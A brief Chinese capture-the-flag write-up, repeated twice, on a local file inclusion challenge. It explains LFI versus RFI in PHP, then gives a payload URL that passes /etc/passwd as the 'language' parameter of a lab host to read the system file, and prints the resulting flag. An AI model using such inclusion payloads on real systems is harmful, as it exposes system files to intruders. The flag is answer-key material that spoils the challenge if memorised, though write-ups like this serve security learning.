lif表示本地文件包含
Rfi表示远程包含,默认php不开启远程文件包含,开启需要[allow_url_include = On]
1.启动场景
2.在网址中输入地址
3.通过构造payload:http://82.157.146.43:16097/?language=/etc/passwd获取flag,如下图:
flag:shellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}
lif表示本地文件包含
Rfi表示远程包含,默认php不开启远程文件包含,开启需要[allow_url_include = On]
1.启动场景
2.在网址中输入地址
3.通过构造payload:http://82.157.146.43:16097/?language=/etc/passwd获取flag,如下图:
flag:shellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}